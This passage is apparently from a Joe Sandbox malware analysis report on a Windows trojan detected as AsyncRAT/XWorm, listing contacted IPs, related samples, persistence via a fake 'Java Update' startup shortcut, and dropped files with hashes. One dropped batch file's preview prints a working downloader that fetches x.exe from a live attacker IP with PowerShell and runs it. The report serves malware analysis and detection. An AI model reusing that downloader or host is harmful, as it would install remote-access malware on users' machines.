                                  http://nuget.org/NuGet.exepowershell.exe, 00000006.00000002.2137130616.000002115400E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2224765791.000002545B66E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2362266084.000002881665E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2553078686.000001DE39D9C000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.microsoft.coX2powershell.exe, 00000006.00000002.2143878534.000002115C767000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000E.00000002.2427728210.000001DE29F59000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000006.00000002.2123727725.00000211441C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2170899412.000002544B82A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2278359605.000002880681A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2427728210.000001DE29F59000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000E.00000002.2427728210.000001DE29F59000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.micom/pkiops/Docs/ry.htm0powershell.exe, 0000000E.00000002.2582478565.000001DE42410000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://contoso.com/Licensepowershell.exe, 0000000E.00000002.2553078686.000001DE39D9C000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://contoso.com/Iconpowershell.exe, 0000000E.00000002.2553078686.000001DE39D9C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://45.141.26.234/x.exeVpowershell.exe, 00000009.00000002.2168411951.00000254498C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://45.141.26.234/x.exeUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERpowershell.exe, 0000000E.00000002.2580037837.000001DE42117000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2422899086.000001DE28360000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://45.141.26.234/x.exeUQpowershell.exe, 00000006.00000002.2123149732.00000211424E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://github.com/Pester/Pesterpowershell.exe, 0000000E.00000002.2427728210.000001DE29F59000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://45.141.26.234/x.exeDXx.exe, 00000005.00000002.3259304446.000000000065F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://45.141.26.234/x.exeGpowershell.exe, 0000000E.00000002.2418921764.000001DE28070000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://45.141.26.234/x.exeCpowershell.exe, 00000009.00000002.2168411951.00000254498B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://crl.microsopowershell.exe, 0000000E.00000002.2577462726.000001DE42070000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.microsoft.Ipowershell.exe, 00000009.00000002.2237003722.0000025463AD0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000006.00000002.2123727725.00000211441C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2170899412.000002544B82A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2278359605.000002880681A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2427728210.000001DE29F59000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://contoso.com/powershell.exe, 0000000E.00000002.2553078686.000001DE39D9C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://nuget.org/nuget.exepowershell.exe, 00000006.00000002.2137130616.000002115400E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2224765791.000002545B66E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2362266084.000002881665E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2553078686.000001DE39D9C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://45.141.26.234/x.exeUSERDOMAIN=user-PCUScux.exe, 00000005.00000002.3281056817.000000001B238000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://aka.ms/pscore68powershell.exe, 00000006.00000002.2123727725.0000021143FA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2170899412.000002544B601000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2278359605.00000288065F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2427728210.000001DE29D31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namex.exe, 00000005.00000002.3264722419.0000000002301000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2123727725.0000021143FA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2170899412.000002544B601000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2278359605.00000288065F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2427728210.000001DE29D31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://crl.microso6powershell.exe, 0000000E.00000002.2577462726.000001DE42070000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://45.141.26.234/x.exe:x.exe, 00000005.00000002.3259304446.000000000059C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://45.141.26.234/x.exezpowershell.exe, 00000009.00000002.2234849597.0000025463940000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://45.141.26.234/x.exeUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFIE=powershell.exe, 0000000C.00000002.2271230289.0000028804880000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown

                                                              World Map of Contacted IPs

                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs

                                                              Public IPs

                                                              IPDomainCountryFlagASNASN NameMalicious
                                                              208.95.112.1
                                                              		ip-api.comUnited States
                                                              		53334TUT-ASUSfalse
                                                              45.141.26.234
                                                              		unknownNetherlands
                                                              		62068SPECTRAIPSpectraIPBVNLtrue

                                                              General Information

                                                              Joe Sandbox version:41.0.0 Charoite
                                                              Analysis ID:1574852
                                                              Start date and time:2024-12-13 17:45:07 +01:00
                                                              Joe Sandbox product:CloudBasic
                                                              Overall analysis duration:0h 6m 22s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                              Number of analysed new started processes analysed:17
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Sample name:da6ke5KbfB.exe
                                                              renamed because original name is a hash value
                                                              Original Sample Name:a091f671b517c660c7a453158d32218a.exe
                                                              Detection:MAL
                                                              Classification:mal100.troj.spyw.evad.winEXE@20/24@1/2
                                                              EGA Information:
                                                              • Successful, ratio: 33.3%
                                                              HCA Information:
                                                              • Successful, ratio: 100%
                                                              • Number of executed functions: 74
                                                              • Number of non-executed functions: 58
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .exe

                                                              Warnings

                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                                                              • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.63
                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                              • Execution Graph export aborted for target powershell.exe, PID 2972 because it is empty
                                                              • Execution Graph export aborted for target powershell.exe, PID 3276 because it is empty
                                                              • Execution Graph export aborted for target powershell.exe, PID 5828 because it is empty
                                                              • Execution Graph export aborted for target powershell.exe, PID 7060 because it is empty
                                                              • Not all processes where analyzed, report is missing behavior information
                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                              • VT rate limit hit for: da6ke5KbfB.exe

                                                              Simulations

                                                              Behavior and APIs

                                                              TimeTypeDescription
                                                              11:45:55API Interceptor82x Sleep call for process: powershell.exe modified
                                                              11:46:59API Interceptor39288x Sleep call for process: x.exe modified
                                                              17:46:59AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java Update (32bit).lnk

                                                              Joe Sandbox View / Context

                                                              IPs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              208.95.112.103VPFXH490.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                              • ip-api.com/line/?fields=hosting
                                                              Chrome Browser Update.exeGet hashmaliciousPredatorBrowse
                                                              • ip-api.com/json/
                                                              boleto.exeGet hashmaliciousXWormBrowse
                                                              • ip-api.com/line/?fields=hosting
                                                              taskhost.exeGet hashmaliciousXWormBrowse
                                                              • ip-api.com/line/?fields=hosting
                                                              XClient.exeGet hashmaliciousXWormBrowse
                                                              • ip-api.com/line/?fields=hosting
                                                              jrockekcurje.exeGet hashmaliciousBlackshadesBrowse
                                                              • ip-api.com/json/
                                                              hbfgjhhesfd.exeGet hashmaliciousBlackshadesBrowse
                                                              • ip-api.com/json/
                                                              Uniswap Sniper Bot With GUI.exeGet hashmaliciousUnknownBrowse
                                                              • ip-api.com/json
                                                              K98766700.exeGet hashmaliciousAgentTeslaBrowse
                                                              • ip-api.com/line/?fields=hosting
                                                              phost.exeGet hashmaliciousBlank GrabberBrowse
                                                              • ip-api.com/json/?fields=225545
                                                              45.141.26.23403VPFXH490.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                _%e0%b8%b0%e0%b8%99%e0%b8%b2%e0%b8%b3%e0%b8%b7.exeGet hashmaliciousAsyncRAT, XWormBrowse

                                                                  Domains

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  ip-api.com03VPFXH490.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                  • 208.95.112.1
                                                                  Chrome Browser Update.exeGet hashmaliciousPredatorBrowse
                                                                  • 208.95.112.1
                                                                  boleto.exeGet hashmaliciousXWormBrowse
                                                                  • 208.95.112.1
                                                                  taskhost.exeGet hashmaliciousXWormBrowse
                                                                  • 208.95.112.1
                                                                  XClient.exeGet hashmaliciousXWormBrowse
                                                                  • 208.95.112.1
                                                                  jrockekcurje.exeGet hashmaliciousBlackshadesBrowse
                                                                  • 208.95.112.1
                                                                  hbfgjhhesfd.exeGet hashmaliciousBlackshadesBrowse
                                                                  • 208.95.112.1
                                                                  Uniswap Sniper Bot With GUI.exeGet hashmaliciousUnknownBrowse
                                                                  • 208.95.112.1
                                                                  K98766700.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 208.95.112.1
                                                                  phost.exeGet hashmaliciousBlank GrabberBrowse
                                                                  • 208.95.112.1

                                                                  ASNs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  SPECTRAIPSpectraIPBVNL03VPFXH490.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                  • 45.141.26.234
                                                                  saiya.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                  • 45.141.26.134
                                                                  windxcmd.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                  • 45.141.26.134
                                                                  mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                  • 45.138.53.54
                                                                  18fvs4AVae.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                  • 45.141.26.170
                                                                  Fulloption_V2.1.exeGet hashmaliciousXWormBrowse
                                                                  • 45.141.27.248
                                                                  BoostFPS.exeGet hashmaliciousXWormBrowse
                                                                  • 45.141.27.248
                                                                  bPRQRIfbbq.exeGet hashmaliciousUnknownBrowse
                                                                  • 45.138.16.44
                                                                  4Fm0sK0yKz.exeGet hashmaliciousAsyncRATBrowse
                                                                  • 45.141.215.18
                                                                  Payload 94.75 (3).225.exeGet hashmaliciousUnknownBrowse
                                                                  • 45.141.215.40
                                                                  TUT-ASUS03VPFXH490.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                  • 208.95.112.1
                                                                  Chrome Browser Update.exeGet hashmaliciousPredatorBrowse
                                                                  • 208.95.112.1
                                                                  boleto.exeGet hashmaliciousXWormBrowse
                                                                  • 208.95.112.1
                                                                  taskhost.exeGet hashmaliciousXWormBrowse
                                                                  • 208.95.112.1
                                                                  XClient.exeGet hashmaliciousXWormBrowse
                                                                  • 208.95.112.1
                                                                  jrockekcurje.exeGet hashmaliciousBlackshadesBrowse
                                                                  • 208.95.112.1
                                                                  hbfgjhhesfd.exeGet hashmaliciousBlackshadesBrowse
                                                                  • 208.95.112.1
                                                                  Uniswap Sniper Bot With GUI.exeGet hashmaliciousUnknownBrowse
                                                                  • 208.95.112.1
                                                                  K98766700.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 208.95.112.1
                                                                  phost.exeGet hashmaliciousBlank GrabberBrowse
                                                                  • 208.95.112.1

                                                                  JA3 Fingerprints

                                                                  No context

                                                                  Dropped Files

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  C:\ProgramData\Java Update (32bit).exe03VPFXH490.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                    C:\Users\user\AppData\Local\Temp\x.exe03VPFXH490.exeGet hashmaliciousAsyncRAT, XWormBrowse

                                                                      Created / dropped Files

                                                                      C:\ProgramData\Java Update (32bit).exe

                                                                      Download File
                                                                      Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):41472
                                                                      Entropy (8bit):5.587183654800141
                                                                      Encrypted:false
                                                                      SSDEEP:768:iZzGU8kyq5bzbTfFN8WuFZ4tJF5PC9O9dU68OMhE3/aZg:uzf95/b7r898Fc9UdU68OMSN
                                                                      MD5:F9A6811D7A9D5E06D73A68FC729CE66C
                                                                      SHA1:C882143D5FDE4B2E7EDB5A9ACCB534BA17D754EF
                                                                      SHA-256:C583D0A367ECFFA74B82B78116BBB04B7C92BED0300ED1C3ADC4EF3250FBB9CC
                                                                      SHA-512:4DEC52F0D1927306DEDA677FEA46D103B052AAA5F7D7F49ABE59A3618110EE542C2DB385158A393970751FCC9687EFE44A860D6330ED474C0C849369C0DA56DF
                                                                      Malicious:true
                                                                      Yara Hits:
                                                                      • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\ProgramData\Java Update (32bit).exe, Author: Joe Security
                                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\ProgramData\Java Update (32bit).exe, Author: Joe Security
                                                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\ProgramData\Java Update (32bit).exe, Author: Joe Security
                                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\ProgramData\Java Update (32bit).exe, Author: ditekSHen
                                                                      Antivirus:
                                                                      • Antivirus: Avira, Detection: 100%
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      • Antivirus: ReversingLabs, Detection: 79%
                                                                      Joe Sandbox View:
                                                                      • Filename: 03VPFXH490.exe, Detection: malicious, Browse
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...kL"g................................. ........@.. ....................................@.................................p...K.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......|]...Y............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:modified
                                                                      Size (bytes):64
                                                                      Entropy (8bit):0.34726597513537405
                                                                      Encrypted:false
                                                                      SSDEEP:3:Nlll:Nll
                                                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                      Malicious:false
                                                                      Preview:@...e...........................................................

                                                                      C:\Users\user\AppData\Local\Temp\D64C.tmp\D64D.tmp\D64E.bat

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\da6ke5KbfB.exe
                                                                      File Type:Non-ISO extended-ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):472
                                                                      Entropy (8bit):3.858603616992878
                                                                      Encrypted:false
                                                                      SSDEEP:6:NS0mRhu8fR3DFscvPrRzR+OOv7Fj7BvyaCw8qOLh8JbEw7monbVZb9Mc8X:NSrfRzFVF0Oyzaa58JGVX55MX
                                                                      MD5:91F3746C22F8381095B9666BAD4AC384
                                                                      SHA1:5A92DF29E9AEC1C9D72D4D6CECE21CE71505A953
                                                                      SHA-256:964BCFAF373C75385AD879C6F77E63DB386198A58BA0112D8952182ED0F914B6
                                                                      SHA-512:3DEC00627158F438EA116D9A050229EE39A22EAFCA1C68B43B66D9EA58BF1BDDCE81F3440C44D99F2BDFE5AAB2A61A76DD77110D154A4020413544785CBB0006
                                                                      Malicious:true
                                                                      Preview:@shift /0..@echo off..setlocal....:: ??.???????????. URL ?????????????????????..set "url=http://45.141.26.234/x.exe"....:: ??.???????????.??.????????.??.?????????????????? (???????????.??.????????? temp)..set "temp_dir=%temp%\x.exe"....:: ??.???????????????????????.????????????..powershell -Command "Invoke-WebRequest -Uri %url% -OutFile %temp_dir%"....:: ???????????????????????.????????.???????????????????????...start %temp_dir%....:: ????????????????????...endlocal..

                                                                      C:\Users\user\AppData\Local\Temp\Log.tmp

                                                                      Download File
                                                                      Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):29
                                                                      Entropy (8bit):3.598349098128234
                                                                      Encrypted:false
                                                                      SSDEEP:3:rRSFYJKXzovNsra:EFYJKDoWra
                                                                      MD5:2C11513C4FAB02AEDEE23EC05A2EB3CC
                                                                      SHA1:59177C177B2546FBD8EC7688BAD19D08D32640DE
                                                                      SHA-256:BCF3676333E528171EEE1055302F3863A0C89D9FFE7017EA31CF264E13C8A699
                                                                      SHA-512:08196AFA62650F1808704DCAD9918DA11175CD8792878F63E35F517B4D6CF407AC9E281D9B71A76E4CC1486CAD7079C56B74ECBEDB0A0F0DD4170FB0D30D2BAD
                                                                      Malicious:false
                                                                      Preview:....### explorer ###..[WIN]r

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2vmzzv3u.rib.psm1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_34kg34ue.wt5.psm1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3gbizhs5.svt.psm1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3yo0gyps.0p0.ps1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_csfgu1j1.s4s.ps1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iwd1sb3s.off.ps1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k05cm14j.ntu.ps1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kkf0uwzj.zdt.psm1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n5uxf51u.dco.ps1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
